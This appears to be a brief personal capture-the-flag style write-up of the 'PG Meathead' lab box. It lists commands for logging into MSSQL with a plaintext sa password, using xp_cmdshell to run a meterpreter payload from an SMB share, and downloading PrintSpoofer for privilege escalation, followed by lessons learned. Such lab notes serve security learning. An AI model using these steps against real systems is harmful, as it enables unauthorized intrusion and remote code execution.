PG Meathead

impacket-mssqlclient sa:EjectFrailtyThorn425@ -p 1435 Share .
xp_cmdshell \\\Share\power.exe (meterpreter shell)
powershell Invoke-WebRequest -OutFile C:\Users\Public\Documents\PrintSpooferx64.exe -Uri

Box is hard. Only got shell. Had to lookup walkthroughs. Its okay, as long as I learn something and don't repeat the same mistake again. I'll be using smbserver over http.server, just to get the hang of it. It will become a permanent jutsu of mine from now on.

Lessons Learned

  1. Set up a if downloading is not working and/or Antivirus is getting in the way.
  2. My PrintSpoofer worked. Metasploit getsystem will also use PrintSpoofer.
  3. First Hard Box on PG attempted.


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